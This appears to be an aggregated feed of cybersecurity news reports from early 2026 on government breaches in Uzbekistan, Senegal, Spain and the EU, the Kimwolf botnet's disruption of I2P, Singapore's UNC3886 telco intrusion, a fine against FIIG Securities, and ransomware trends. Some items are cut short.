An alleged Uzbekistan cyberattack that triggered widespread concern online has exposed around 60,000 unique data records, not the personal data of 15 million citizens, as previously claimed on social media. The clarification came from Uzbekistan’s Digital Technologies Minister Sherzod Shermatov during a press conference on 12 February, addressing mounting speculation surrounding the scale of the breach. From 27 to 30 January, information systems of three government agencies in Uzbekistan were targeted by cyberattacks. The names of the agencies have not been disclosed. However, officials were firm in rejecting viral claims suggesting a large-scale national data leak. “There is no information that the personal data of 15 million citizens of Uzbekistan is being sold online. 60,000 pieces of data — that could be five or six pieces of data per person. We are not talking about 60,000 citizens,” the minister noted, adding that law enforcement agencies were examining the types of data involved. For global readers, the distinction matters. In cybersecurity reporting, raw data units are often confused with the number of affected individuals. A single record can include multiple data points such as a name, date of birth, address, or phone number. According to Shermatov, the 60,000 figure refers to individual data units, not the number of citizens impacted.

Also read: Sanctioned Spyware Vendor Used iOS Zero-Day Exploit Chain Against Egyptian Targets

Uzbekistan Cyberattack: What Actually Happened

The Uzbekistan cyberattack targeted three government information systems over a four-day period in late January. While the breach did result in unauthorized access to certain systems, the ministry emphasized that it was not a mass compromise of citizen accounts. “Of course, there was an attack. The hackers were skilled and sophisticated. They made attempts and succeeded in gaining access to a specific system. In a sense, this is even useful — an incident like this helps to further examine other systems and increase vigilance. Some data, in a certain amount, could indeed have been obtained from some systems,” Shermatov said. His remarks reveal a balanced acknowledgment: the attack was real, the threat actors were capable, and some data exposure did occur. At the same time, the scale appears significantly smaller than initially portrayed online. The ministry also stressed that a “personal data leak” does not mean citizens’ accounts were hacked or that full digital identities were compromised. Instead, limited personal details may have been accessed.

Rising Cyber Threats in Uzbekistan

The Uzbekistan cyberattack comes amid a sharp increase in attempted digital intrusions across the country. According to the ministry, more than 7 million cyber threats were prevented in 2024 through Uzbekistan’s cybersecurity infrastructure. In 2025, that number reportedly exceeded 107 million. Looking ahead, projections suggest that over 200 million cyberattacks could target Uzbekistan in 2026. These figures highlight a broader global trend: as countries accelerate digital transformation, they inevitably expand their attack surface. Emerging digital economies, in particular, often face intense pressure from transnational cybercriminal groups seeking to exploit gaps in infrastructure and rapid system expansion. Uzbekistan’s growing digital ecosystem — from e-government services to financial platforms — is becoming a more attractive target for global threat actors. The recent Uzbekistan cyberattack illustrates that no country, regardless of size, is immune.

Strengthening Security After the Breach

Following the breach, authorities blocked further unauthorized access attempts and reinforced technical safeguards. Additional protections were implemented within the Unified Identification System (OneID), Uzbekistan’s centralized digital identity platform. Under the updated measures, users must now personally authorize access to their data by banks, telecom operators, and other organizations. This shifts more control, and responsibility, directly to citizens. The ministry emphasized that even with partial personal data, fraudsters cannot fully act on behalf of a citizen without direct involvement. However, officials warned that attackers may attempt secondary scams using exposed details. For example, a fraudster could call a citizen, pose as a bank employee, cite known personal details, and claim that someone is applying for a loan in their name — requesting an SMS code to “cancel” the transaction. Such social engineering tactics remain one of the most effective tools for cybercriminals globally.

A Reality Check on Digital Risk

The Uzbekistan cyberattack highlights two critical lessons. First, misinformation can amplify panic faster than technical facts. Second, even limited data exposure carries real risk if exploited creatively. Shermatov’s comment that the incident can help “increase vigilance” reflects a pragmatic view shared by many cybersecurity professionals worldwide: breaches, while undesirable, often drive improvements in resilience. For Uzbekistan, the challenge now is sustaining public trust while hardening systems against a growing global cyber threats. For the rest of the world, the incident serves as a reminder that cybersecurity transparency — clear communication about scope and impact — is just as important as technical defense.

For the past week, the massive “Internet of Things” (IoT) botnet known as Kimwolf has been disrupting The Invisible Internet Project (I2P), a decentralized, encrypted communications network designed to anonymize and secure online communications. I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnet’s control servers.

Kimwolf is a botnet that surfaced in late 2025 and quickly infected millions of systems, turning poorly secured IoT devices like TV streaming boxes, digital picture frames and routers into relays for malicious traffic and abnormally large distributed denial-of-service (DDoS) attacks.

I2P is a decentralized, privacy-focused network that allows people to communicate and share information anonymously.

“It works by routing data through multiple encrypted layers across volunteer-operated nodes, hiding both the sender’s and receiver’s locations,” the I2P website explains. “The result is a secure, censorship-resistant network designed for private websites, messaging, and data sharing.”

On February 3, I2P users began complaining on the organization’s GitHub page about tens of thousands of routers suddenly overwhelming the network, preventing existing users from communicating with legitimate nodes. Users reported a rapidly increasing number of new routers joining the network that were unable to transmit data, and that the mass influx of new systems had overwhelmed the network to the point where users could no longer connect.

When one I2P user asked whether the network was under attack, another user replied, “Looks like it. My physical router freezes when the number of connections exceeds 60,000.”

The same day that I2P users began noticing the outages, the individuals in control of Kimwolf posted to their Discord channel that they had accidentally disrupted I2P after attempting to join 700,000 Kimwolf-infected bots as nodes on the network.

Although Kimwolf is known as a potent weapon for launching DDoS attacks, the outages caused this week by some portion of the botnet attempting to join I2P are what’s known as a “Sybil attack,” a threat in peer-to-peer networks where a single entity can disrupt the system by creating, controlling, and operating a large number of fake, pseudonymous identities.

Indeed, the number of Kimwolf-infected routers that tried to join I2P this past week was many times the network’s normal size. I2P’s Wikipedia page says the network consists of roughly 55,000 computers distributed throughout the world, with each participant acting as both a router (to relay traffic) and a client.

However, Lance James, founder of the New York City based cybersecurity consultancy Unit 221B and the original founder of I2P, told KrebsOnSecurity the entire I2P network now consists of between 15,000 and 20,000 devices on any given day.

Benjamin Brundage is founder of Synthient, a startup that tracks proxy services and was the first to document Kimwolf’s unique spreading techniques. Brundage said the Kimwolf operator(s) have been trying to build a command and control network that can’t easily be taken down by security companies and network operators that are working together to combat the spread of the botnet.

Brundage said the people in control of Kimwolf have been experimenting with using I2P and a similar anonymity network — Tor — as a backup command and control network, although there have been no reports of widespread disruptions in the Tor network recently.

“I don’t think their goal is to take I2P down,” he said. “It’s more they’re looking for an alternative to keep the botnet stable in the face of takedown attempts.”

The Kimwolf botnet created challenges for Cloudflare late last year when it began instructing millions of infected devices to use Cloudflare’s domain name system (DNS) settings, causing control domains associated with Kimwolf to repeatedly usurp Amazon, Apple, Google and Microsoft in Cloudflare’s public ranking of the most frequently requested websites.

James said the I2P network is still operating at about half of its normal capacity, and that a new release is rolling out which should bring some stability improvements over the next week for users.

Meanwhile, Brundage said the good news is Kimwolf’s overlords appear to have quite recently alienated some of their more competent developers and operators, leading to a rookie mistake this past week that caused the botnet’s overall numbers to drop by more than 600,000 infected systems.

“It seems like they’re just testing stuff, like running experiments in production,” he said. “But the botnet’s numbers are dropping significantly now, and they don’t seem to know what they’re doing.”

For the past week, the massive "Internet of Things" (IoT) botnet known as Kimwolf has been disrupting the The Invisible Internet Project (I2P), a decentralized, encrypted communications network designed to anonymize and secure online communications. I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnet's control servers.

The post Kimwolf Botnet Swamps Anonymity Network I2P appeared first on Security Boulevard.

Australian fixed-income firm FIIG Securities has been fined AU$2.5 million after the Federal Court found it failed to adequately protect client data from cybersecurity threats over a period exceeding four years. The penalty follows a major FIIG cyberattack in 2023 that resulted in the theft and exposure of highly sensitive personal and financial information belonging to thousands of clients.  It is the first time the Federal Court has imposed civil penalties for cybersecurity failures under the general obligations of an Australian Financial Services (AFS) license.   In addition to the fine, the court ordered FIIG Securities to pay AU$500,000 toward the Australian Securities and Investments Commission’s (ASIC) enforcement costs. FIIG must also implement a compliance program, including the engagement of an independent expert to ensure its cybersecurity and cyber resilience systems are reasonably managed going forward. 

FIIG Cyberattack Exposed Sensitive Client Data After Years of Security Gaps 

The enforcement action stems from a ransomware attack that occurred in 2023. ASIC alleged that between March 2019 and June 2023, FIIG Securities failed to implement adequate cybersecurity measures, leaving its systems vulnerable to intrusion. On May 19, 2023, a hacker gained access to FIIG’s IT network and remained undetected for nearly three weeks.  During that time, approximately 385 gigabytes of confidential data were exfiltrated. The stolen data included names, addresses, dates of birth, driver’s licences, passports, bank account details, tax file numbers, and other sensitive information. FIIG later notified around 18,000 clients that their personal data may have been compromised as a result of the FIIG cyberattack.  Alarmingly, FIIG Securities did not discover the breach on its own. The company became aware of the incident only after being contacted by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) on June 2. Despite receiving this warning, FIIG did not launch a formal internal investigation until six days later.  FIIG admitted it had failed to comply with its AFS licence obligations and acknowledged that adequate cybersecurity controls would have enabled earlier detection and response. The firm also conceded that adherence to its own policies and procedures could have prevented much of the client information from being downloaded. 

Regulatory Action Against FIIG Securities Sets Precedent for Cybersecurity Enforcement 

ASIC Deputy Chair Sarah Court said the case highlights the growing risks posed by cyber threats and the consequences of inadequate controls. “Cyber-attacks and data breaches are escalating in both scale and sophistication, and inadequate controls put clients and companies at real risk,” she said. “ASIC expects financial services licensees to be on the front foot every day to protect their clients. FIIG wasn’t – and they put thousands of clients at risk.”  ASIC Chair Joe Longo described the matter as a broader warning for Australian businesses. “This matter should serve as a wake-up call to all companies on the dangers of neglecting cybersecurity systems,” he said, emphasizing that cybersecurity is not a “set and forget” issue but one that requires continuous monitoring and improvement.  ASIC alleged that FIIG Securities failed to implement basic cybersecurity protection, including properly configured firewalls, regular patching of software and operating systems, mandatory cybersecurity training for staff, and sufficient allocation of financial and human resources to manage cyber risk.  Additional deficiencies cited by ASIC included the absence of an up-to-date incident response plan, ineffective privileged access management, lack of regular vulnerability scanning, failure to deploy endpoint detection and response tools, inadequate use of multi-factor authentication, and a poorly configured Security Information and Event Management (SIEM) system. 

Lessons From the FIIG Cyberattack for Australia’s Financial Sector 

Cybersecurity experts have pointed out that the significance of the FIIG cyberattack lies not only in the breach itself but in the prolonged failure to implement reasonable protections. Annie Haggar, Partner and Head of Cybersecurity at Norton Rose Fulbright Australia, noted in a LinkedIn post that ASIC’s case provides clarity on what regulators consider “adequate” cybersecurity. Key factors include the nature of the business, the sensitivity of stored data, the value of assets under management, and the potential impact of a successful attack.  The attack on FIIG Securities was later claimed by the ALPHV/BlackCat ransomware group, which stated on the dark web that it had stolen approximately 385GB of data from FIIG’s main server. The group warned the company that it had three days to make contact regarding the consequences of what it described as a failure by FIIG’s IT department.  According to FBI and Center for Internet Security reports, the ALPHV/BlackCat group gains initial access using compromised credentials, deploys PowerShell scripts and Cobalt Strike to disable security features, and uses malicious Group Policy Objects to spread ransomware across networks.  The breach was discovered after an employee reported being locked out of their email account. Further investigation revealed that files had been encrypted and backups wiped. While FIIG managed to restore some systems, other data could not be recovered. 

The recent Senegal cyberattack on the Directorate of File Automation (DAF) has done more than disrupt government services. It has exposed how vulnerable the country’s most sensitive data systems really are, and why cybersecurity can no longer be treated as a technical issue handled quietly in the background. DAF, the government agency responsible for managing national ID cards, passports, biometric records, and electoral data, was forced to temporarily shut down operations after detecting a cyber incident. For millions of Senegalese citizens, this means delays in accessing essential identity services. For the country, it raises far bigger concerns about data security and national trust.

Senegal Cyberattack Brings Identity Services to a Standstill

In an official public notice, DAF confirmed that the production of national identity cards had been suspended following the cyberattack. Authorities assured citizens that personal data had not been compromised and that systems were being restored. However, as days passed and the DAF website remained offline, doubts began to grow. A Senegal cyberattack affecting such a critical agency is not something that can be brushed off quickly, especially when biometric and identity data are involved. [caption id="attachment_109392" align="aligncenter" width="500"] Image Source: X[/caption]

Hackers Claim Theft of Massive Biometric Data

The situation escalated when a ransomware group calling itself The Green Blood Group claimed responsibility for the attack. The group says it stole 139 terabytes of data, including citizen records, biometric information, and immigration documents. To back up its claims, the hackers released data samples on the dark web. They also shared an internal email from IRIS Corporation Berhad, a Malaysian company working with Senegal on its digital national ID system. In the email, a senior IRIS executive warned that two DAF servers had been breached and that card personalization data may have been accessed. Emergency steps were taken, including cutting network connections and shutting access to external offices. Even if authorities insist that data integrity remains intact, the scale of the alleged breach makes the Senegal cyberattack impossible to ignore.

Implications of the Senegal Cyberattack

DAF is not just another government office. It manages the digital identities of Senegalese citizens. Any compromise—real or suspected—creates long-term risks, from identity fraud to misuse of biometric data. What makes this incident more worrying is that it is not the first major breach. Just months ago, Senegal’s tax authority also suffered a cyberattack. Together, these incidents point to a larger problem: critical systems are being targeted, and attackers are finding ways in. Cybercrime groups are no longer experimenting in Africa. They are operating with confidence, speed, and clear intent. The Green Blood Group, which appeared only recently, has reportedly targeted just two countries so far—Senegal and Egypt. That alone should be taken seriously.

Disputes, Outsourcing, and Cybersecurity Blind Spots

The cyberattack also comes during a payment dispute between the Senegalese government and IRIS Corporation. While no official link has been confirmed, the situation highlights a key issue: when governments rely heavily on third-party vendors, cybersecurity responsibility can become blurred. The lesson from this Senegal cyberattack is simple and urgent. Senegal needs a dedicated National Cybersecurity Agency, along with a central team to monitor, investigate, and respond to cyber incidents across government institutions. Cyberattacks in Africa are no longer rare or unexpected. They are happening regularly, and they are hitting the most sensitive systems. Alongside better technology, organizations must focus on insider threats, staff awareness, and leadership accountability. If sensitive data from this attack is eventually leaked, the damage will be permanent. Senegal still has time to act—but only if this warning is taken seriously.

The European Commission's central infrastructure for managing mobile devices was hit by a cyberattack on January 30, the Commission has revealed. The announcement said the European Commission mobile cyberattack was limited by swift action, but cybersecurity observers are speculating that the incident was linked to another recent European incident involving Netherlands government targets that was revealed around the same time.

European Commission Mobile Cyberattack Detailed

The European Commission’s Feb. 5 announcement said its mobile management infrastructure “identified traces of a cyber-attack, which may have resulted in access to staff names and mobile numbers of some of its staff members. The Commission's swift response ensured the incident was contained and the system cleaned within 9 hours. No compromise of mobile devices was detected.” The Commission said it will “continue to monitor the situation. It will take all necessary measures to ensure the security of its systems. The incident will be thoroughly reviewed and will inform the Commission's ongoing efforts to enhance its cybersecurity capabilities.” The Commission provided no further details on the attack, but observers wondered if it was connected to another incident involving Dutch government targets that was revealed the following day.

Dutch Cyberattack Targeted Ivanti Vulnerabilities

In a Feb. 6 letter (download, in Dutch) to the Dutch Parliament, State Secretary for Justice and Security Arno Rutte said the Dutch Data Protection Authority (AP) and the Council for the Judiciary (Rvdr) had been targeted in an “exploitation of a vulnerability in Ivanti Endpoint Manager Mobile (EPMM).” Rutte said the Dutch National Cyber ​​Security Centre (NCSC) was informed by Ivanti on January 29 about vulnerabilities in EPMM, which is used for managing and securing mobile devices, apps and content. On January 29, Ivanti warned that two critical zero-day vulnerabilities in EPMM were under attack. CVE-2026-1281 and CVE-2026-1340 are both 9.8-severity code injection flaws, affecting EPMM’s In-House Application Distribution and Android File Transfer Configuration features, and could allow unauthenticated remote attackers to execute arbitrary code on vulnerable on-premises EPMM installations without any prior authentication. “Based on the information currently available, I can report that at least the AP and the Rvdr have been affected,” Rutte wrote. Work-related data of AP employees, such as names, business email addresses, and telephone numbers, “have been accessed by unauthorized persons,” he added. “Immediate measures were taken after the incident was discovered. In addition, the employees of the AP and the Rvdr have been informed. The AP has reported the incident to its data protection officer. The Rvdr has submitted a preliminary data breach notification to the AP.” NCSC is monitoring further developments with the Ivanti vulnerability and “is in close contact” with international partners, the letter said. Meanwhile, the Chief Information Officer of the Dutch government “is coordinating the assessment of whether there is a broader impact within the central government.”

European Commission Calls for Stronger Cybersecurity Controls

The European Commission’s statement noted that “As Europe faces daily cyber and hybrid attacks on essential services and democratic institutions, the Commission is committed to further strengthen the EU's cybersecurity resilience and capabilities.” To that end, the Commission introduced a Cybersecurity Package on January 20 to bolster the European Union's cyber defenses. “A central pillar of this initiative is the Cybersecurity Act 2.0, which introduces a framework for a Trusted ICT Supply Chain to mitigate risks from high-risk suppliers,” the EC statement said.

Singapore has launched its largest-ever coordinated cyber defense operation following a highly targeted cyberattack on telecommunications that affected all four of the country’s major telecommunications operators.   The cyberattack in Singapore was attributed to the advanced threat actor UNC3886, according to Minister for Digital Development and Information and Minister-in-charge of Cybersecurity and Smart Nation Group, Josephine Teo. She disclosed the details on Feb. 9 while speaking at an engagement event for cyber defenders involved in the national response effort, codenamed Operation Cyber Guardian.  Teo confirmed that the UNC3886 cyberattack in Singapore targeted M1, Singtel, StarHub, and Simba.

Also read: ‘UNC3886 is Attacking Our Critical Infrastructure Right Now’: Singapore’s National Security Lawmaker

Decoding the UNC3886 Cyberattack in Singapore 

Once suspicious activity was detected, the affected operators immediately alerted the Infocomm Media Development Authority (IMDA) and the Cyber Security Agency of Singapore (CSA). CSA, IMDA, and several other government bodies then launched Operation Cyber Guardian to contain the breach.   The operation involved more than 100 cyber defenders from six government agencies, including CSA, IMDA, the Singapore Armed Forces’ Digital and Intelligence Service, the Centre for Strategic Infocomm Technologies, the Internal Security Department, and GovTech, all working closely with the telcos.  Teo said the response has, for now, managed to limit the attackers’ activities. Although the attackers accessed a small number of critical systems in one instance, they were unable to disrupt services or move deeper into the telco networks. “There is also no evidence thus far to suggest that the attackers were able to access or steal sensitive customer data,” she said. 

UNC3886 Cyberattack Posed Severe Risks to Essential Services 

Despite the containment, Teo warned against complacency. She stressed that the cyberattack in Singapore highlighted the presence of persistent threat actors capable of targeting critical infrastructure. She added that sectors such as power, water, and transport could also face similar threats and urged private-sector operators to remain vigilant.  The government, Teo said, will continue to work closely with critical infrastructure operators through cybersecurity exercises and the sharing of classified threat intelligence to enable early detection and faster response. “But even as we try our best to prevent and detect cyber-attacks, we may not always be able to stop them in time,” she said. “All of us must also be prepared for the threat of disruption.”  The UNC3886 operation was first revealed publicly in July 2025 by Minister for Home Affairs and Coordinating Minister for National Security K Shanmugam. Teo described the telecommunication cyberattack as a “potentially more serious threat” than previous cyber incidents faced by Singapore, noting that it targeted systems directly responsible for delivering essential public services.  “The consequences could have been more severe,” she said. “If the attack went far enough, it could have allowed the attacker to one day cut off telecoms or internet services.”  Investigations later revealed that the UNC3886 cyberattack in Singapore was a deliberate, targeted, and well-planned campaign aimed specifically at the telco sector. The attackers exploited a zero-day vulnerability, a previously unknown flaw for which no patch was available at the time. Teo likened this to “finding a new key that no one else had found, to unlock the doors to our telcos’ information system and networks.”  After gaining access, UNC3886 reportedly stole a small amount of technical data and used advanced techniques to evade detection and erase forensic traces. Beyond espionage, the group was assessed to have the capability to disrupt telecommunications and internet services, which could have had knock-on effects on banking, finance, transport, and medical services. 

Telcos and Government Strengthen Defenses Against Persistent Threats 

In a joint statement, M1, Singtel, StarHub, and Simba said they face a wide range of cyber threats, including distributed denial-of-service attacks, malware, phishing, and persistent campaigns.   To counter these risks, the telcos said they have implemented defense-in-depth measures and carried out prompt remediation when vulnerabilities are identified. They also emphasized close collaboration with government agencies and industry experts to strengthen resilience. “Protecting our critical infrastructure is a top priority. We will continue to keep pace with the evolving cyber threat landscape and update our measures accordingly,” the statement said.  UNC3886 is a China-linked cyber espionage actor classified as an Advanced Persistent Threat. The “UNC” label indicates that the group remains uncategorized. Cybersecurity researchers have observed that UNC3886 frequently targets network devices and virtualization technologies, often exploiting zero-day vulnerabilities. The group primarily focuses on defense, technology, and telecommunication organizations in the United States and Asia. 

Open source packages published on the npm and PyPI repositories were laced with code that stole wallet credentials from dYdX developers and backend systems and, in some cases, backdoored devices, researchers said.

“Every application using the compromised npm versions is at risk ….” the researchers, from security firm Socket, said Friday. “Direct impact includes complete wallet compromise and irreversible cryptocurrency theft. The attack scope includes all applications depending on the compromised versions and both developers testing with real credentials and production end-users."

Packages that were infected were:

Read full article

Comments

© Getty Images

The Spain Ministry of Science cyberattack has caused a partial shutdown of government IT systems, disrupting services used daily by researchers, universities, students, and businesses across the country. While officials initially described the issue as a “technical incident,” boarding evidence and confirmations from Spanish media now point to a cyberattack involving potentially sensitive academic, personal, and financial data. The Ministry of Science, Innovation and Universities plays a central role in Spain’s research and higher education ecosystem. Any disruption to its digital infrastructure has wide-reaching consequences, making this incident far more serious than a routine systems outage.

Official Notice Confirms System Closure and Suspended Procedures

In a public notice published on its electronic headquarters, the ministry acknowledged the disruption and announced a temporary shutdown of key digital services. “As a result of a technical incident that is currently being assessed, the electronic headquarters of the Ministry of Science, Innovation and Universities has been partially closed.” The notice further stated: “All ongoing administrative procedures are suspended, safeguarding the rights and legitimate interests of all persons affected by said temporary closure, resulting in an extension of all deadlines for the various procedures affected.” The ministry added that deadline extensions would remain in place “until the complete resolution of the aforementioned incident occurs,” citing Article 32 of Law 39/2015. While procedural safeguards are welcome, the lack of early transparency around the nature of the incident raised concerns among affected users.

Spain Ministry of Science Cyberattack: Hacker Claims 

Those concerns intensified when a threat actor using the alias “GordonFreeman” appeared on underground forums claiming responsibility for the Spain Ministry of Science cyberattack. The attacker alleged that they exploited a critical Insecure Direct Object Reference (IDOR) vulnerability, granting “full-admin-level access” to internal systems. Data samples shared online—though not independently verified—include screenshots of official documents, email addresses, enrollment applications, and internal records. Spanish media outlet OKDIARIO reported that a ministry spokesperson confirmed the IT disruption was linked to a cyberattack and that the electronic headquarters had been shut down to assess the scope of the data breach. Although the forum hosting the alleged leak is now offline and the data has not resurfaced elsewhere, the screenshots appear legitimate. If confirmed, this would represent a serious breakdown in access control protections.

Alleged Data Exposure Raises Serious Privacy Concerns

According to claims made by the attacker, the stolen data includes highly sensitive information related to students and researchers, such as:

• Scanned ID documents, NIEs, and passports
• Email addresses
• Payment receipts showing IBAN numbers
• Academic records, including transcripts and apostilled degrees
• Curricula containing private personal data

If even a portion of this data is authentic, the Spain Ministry of Science cyberattack could expose thousands of individuals to identity theft, financial fraud, and long-term privacy risks. Academic data, in particular, is difficult to replace or invalidate once leaked.

Spain’s Growing Cybercrime Problem

This Spain Ministry of Science cyberattack incident does not exist in isolation. Cybercrime now accounts for more than one in six recorded criminal offenses in Spain. Attacks have increased by 35% this year, with more than 45,000 incidents reported daily. Between late February and early March, attacks surged by 750% compared to the same period last year. During the week of 5–11 March 2025, Spain was the most targeted country globally, accounting for 22.6% of all cyber incidents—surpassing even the United States. Two factors continue to drive this trend. Rapid digital transformation, fueled by EU funding, has often outpaced cybersecurity investment. At the same time, ransomware attacks—up 120%—have increasingly targeted organizations with weak defenses, particularly public institutions and SMEs. The Spain Ministry of Science cyberattack stresses a hard truth, digital services without strong security become liabilities, not efficiencies. As public administrations expand online access, cybersecurity can no longer be treated as a secondary concern or an afterthought. Until Spain addresses systemic gaps in public-sector cybersecurity, incidents like Spain Ministry of Science cyberattack will continue, not as exceptions, but as warnings ignored too long.

Rome’s Sapienza University, Europe’s largest university by number of on-campus students, is grappling with a major IT outage following a cyberattack on La Sapienza that disrupted digital services across the institution. The La Sapienza cyberattack has forced the university to take critical systems offline as officials work to contain the incident and restore operations.  The university publicly acknowledged the cyberattack on La Sapienza earlier this week through a social media statement, confirming that its IT infrastructure “has been the target of a cyberattack.” As an immediate response, Sapienza ordered a shutdown of its network systems “to ensure the integrity and security of data,” a decision that triggered widespread operational disruptions. 

Updates to the La Sapienza Cyberattack

Sapienza University of Rome enrolls more than 112,500 students, making the impact of the outage particularly significant. Following the incident, university officials notified Italian authorities and established a dedicated technical task force to coordinate remediation and recovery efforts. As of the latest updates, the university’s official website remains offline, and recovery status updates have been communicated primarily through social media channels, including Instagram. To mitigate disruption to students, the university announced the creation of temporary in-person “infopoints.” These locations are intended to provide access to information normally available through digital systems and databases that remain unavailable due to the cyberattack on La Sapienza.

Cyberattack on La Sapienza Linked to BabLock Malware 

While the university has not publicly confirmed the technical nature of the incident or identified those responsible, Italian newspaper Corriere Della Sera reports that the La Sapienza cyberattack bears the hallmarks of a ransomware operation. According to the outlet, the attack is allegedly linked to a previously unknown, pro-Russian threat actor known as “Femwar02.”  The reporting suggests the attackers used BabLock malware, also referred to as Rorschach, based on observed malware characteristics and operational behavior. BabLock malware first emerged in 2023 and has attracted researchers' attention for its unusually fast encryption speeds and extensive customization capabilities.  Sources cited by Corriere della Sera claim that the systems at Sapienza were encrypted and that a ransom demand exists. However, university staff reportedly have not opened the ransom note, as doing so would trigger a 72-hour countdown timer. As a result, the ransom amount has not been disclosed. This tactic, designed to pressure victims into rapid negotiations, is increasingly common in ransomware campaigns using BabLock malware. 

Investigation and Recovery Efforts Continue 

In response to the cyberattack on La Sapienza, university technicians are working alongside Italy’s national Computer Security Incident Response Team (CSIRT), specialists from the Agenzia per la Cybersicurezza Nazionale (ACN), and the Polizia Postale. Their primary objective is to restore systems using backups, which, according to reports, were not affected by the attack.  Italy’s national cybersecurity agency has confirmed that it is investigating the incident. However, neither Sapienza University nor Italian authorities have publicly verified whether the attack involved ransomware or whether any data was exfiltrated. This distinction is critical: encryption-only incidents primarily cause operational disruption, while confirmed data theft can trigger additional legal and regulatory obligations under the EU’s General Data Protection Regulation (GDPR). 

Unit 42 researchers say an Asian threat group behind what they call the Shadow Campaigns has targeted government agencies in 37 countries in a wide-ranging global cyberespionage campaign that has involved phishing attacks and the exploitation of a more than a dozen known vulnerabilities.

The post Threat Group Running Espionage Operations Against Dozens of Governments appeared first on Security Boulevard.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has been “silently” updating its Known Exploited Vulnerabilities (KEV) catalog when it concludes that vulnerabilities have been exploited by ransomware groups, according to a security researcher. CISA adds a “known” or “unknown” field next to the “Known To Be Used in Ransomware Campaigns?” entry in its KEV catalog. The problem, according to a blog post by Glenn Thorpe of GreyNoise, is the agency doesn’t send out advisories when a vulnerability changes from “unknown” to “known” vulnerabilities exploited by ransomware groups. Thorpe downloaded daily CISA KEV snapshots for all of 2025 and found that the agency had flipped 59 vulnerabilities in 2025 from “unknown” to “known” evidence of exploitation by ransomware groups. “When that field flips from ‘Unknown’ to ‘Known,’ CISA is saying: ‘We have evidence that ransomware operators are now using this vulnerability in their campaigns,’" Thorpe wrote. “That's a material change in your risk posture. Your prioritization calculus should shift. But there's no alert, no announcement. Just a field change in a JSON file. This has always frustrated me.” In a statement shared with The Cyber Express, CISA Executive Assistant Director for Cybersecurity Nick Andersen suggested that the agency is considering Thorpe’s input. “We continue to streamline processes and enrich vulnerability data through initiatives like the KEV catalog, the Common Vulnerabilities and Exposures (CVE) Program, and Vulnrichment,” Andersen said. “Feedback from the cybersecurity community is essential as CISA works to enhance the KEV catalog and advance vulnerability prioritization across the ecosystem.”

Microsoft Leads in Vulnerabilities Exploited by Ransomware Groups

Of the 59 CVEs that flipped to “known” exploitation by ransomware groups last year, 27% were Microsoft vulnerabilities, Thorpe said. Just over a third (34%) involved edge and network CVEs, and 39% were for CVEs before 2023. And 41% of the flipped vulnerabilities occurred in a single month, May 2025. The “Fastest time-to-ransomware flip” was one day, while the longest lag between CISA KEV addition and the change to “known” ransomware exploitation status was 1,353 days. The “Most flipped vulnerability type” was Authentication Bypass at 14% of occurrences.

Ransomware Groups Target Edge Devices

Edge devices accounted for a high number of the flipped vulnerabiities, Thorpe said. Fortinet, Ivanti, Palo Alto and Check Point Security edge devices were among the flipped CVEs. “Ransomware operators are building playbooks around your perimeter,” he said. Thorpe said that 19 of the 59 flipped vulnerabilities “target network security appliances, the very devices deployed to protect organizations.” But he added: “Legacy bugs show up too; Adobe Reader vulnerabilities from years ago suddenly became ransomware-relevant.” Authentication bypasses and RCE vulnerabilities were the most common, “as ransomware operators prioritize ‘get in and go’ attack chains.” The breakdown by vendor of the 59 vulnerabilities “shouldn't surprise anyone,” he said. Microsoft was responsible for 16 of the flipped CVEs, affecting SharePoint, Print Spooler, Group Policy, Mark-of-the-Web bypasses, and more. Ivanti products were affected by 6 of the flipped CVEs, Fortinet by 5 (with FortiOS SSL-VPN heap overflows standing out), and Palo Alto Networks and Zimbra were each affected by 3 of the CVEs. “Ransomware operators are economic actors after all,” Thorpe said. “They invest in exploit development for platforms with high deployment and high-value access. Firewalls, VPN concentrators, and email servers fit that profile perfectly.” He also noted that the pace of vulnerability exploitation by ransomware groups accelerated in 2025. “Today, ransomware operators are integrating fresh exploits into their playbooks faster than defenders are patching,” he said. Thorpe created an RSS feed to track the flipped vulnerabilities; it’s updated hourly.

Ransomware attacks have soared 30% since late last year, and they’ve continued that trend so far in 2026, with many of the attacks affecting software and manufacturing supply chains. Those are some of the takeaways of new research published by Cyble today, which also looked at the top ransomware groups, significant ransomware attacks, new ransomware groups, and recommended cyber defenses. Ransomware groups claimed 2,018 attacks in the last three months of 2025, averaging just under 673 a month to end a record-setting year. The elevated attack levels continued in January 2026, as the threat groups claimed 679 ransomware victims. In the first nine months of 2025, ransomware groups claimed an average of 512 victims a month, so the recent trend has been more than 30% above that, Cyble noted. Below is Cyble’s chart of ransomware attacks by month since 2021, which shows a sustained uptrend since mid-2025.

Qilin Remains Top Ransomware Group as CL0P Returns

Qilin was once again the top ransomware group, claiming 115 victims in January. CL0P was second with 93 victims after claiming “scores of victims” in recent weeks in an as-yet unspecified campaign. Akira remained among the leaders with 76 attacks, and newcomers Sinobi and The Gentlemen rounded out the top five (chart below). [caption id="attachment_109255" align="aligncenter" width="845"] Top ransomware groups January 2026 (Cyble)[/caption] “As CL0P tends to claim victims in clusters, such as its exploitation of Oracle E-Business Suite flaws that helped drive supply chain attacks to records in October, new campaigns by the group are noteworthy,” Cyble said. Victims in the latest campaign have included 11 Australia-based companies spanning a range of sectors such as IT, banking and financial services (BFSI), construction, hospitality, professional services, and healthcare. Other recent CL0P victims have included “a U.S.-based IT services and staffing company, a global hotel company, a major media firm, a UK payment processing company, and a Canada-based mining company engaged in platinum group metals production,” Cyble said. The U.S. once again led all countries in ransomware attacks (chart below), while the UK and Australia faced a higher-than-normal attack volume. “CL0P’s recent campaign was a factor in both of those increases,” Cyble said. [caption id="attachment_109256" align="aligncenter" width="831"] Ransomware attacks by country January 2026 (Cyble)[/caption] Construction, professional services and manufacturing remain opportunistic targets for threat actors, while the IT industry also remains a favorite target of ransomware groups, “likely due to the rich target the sector represents and the potential to pivot into downstream customer environments,” Cyble said (chart below). [caption id="attachment_109258" align="aligncenter" width="819"] Ransomware attacks by industry January 2026 (Cyble)[/caption]

Ransomware Attacks Hit the Supply Chain

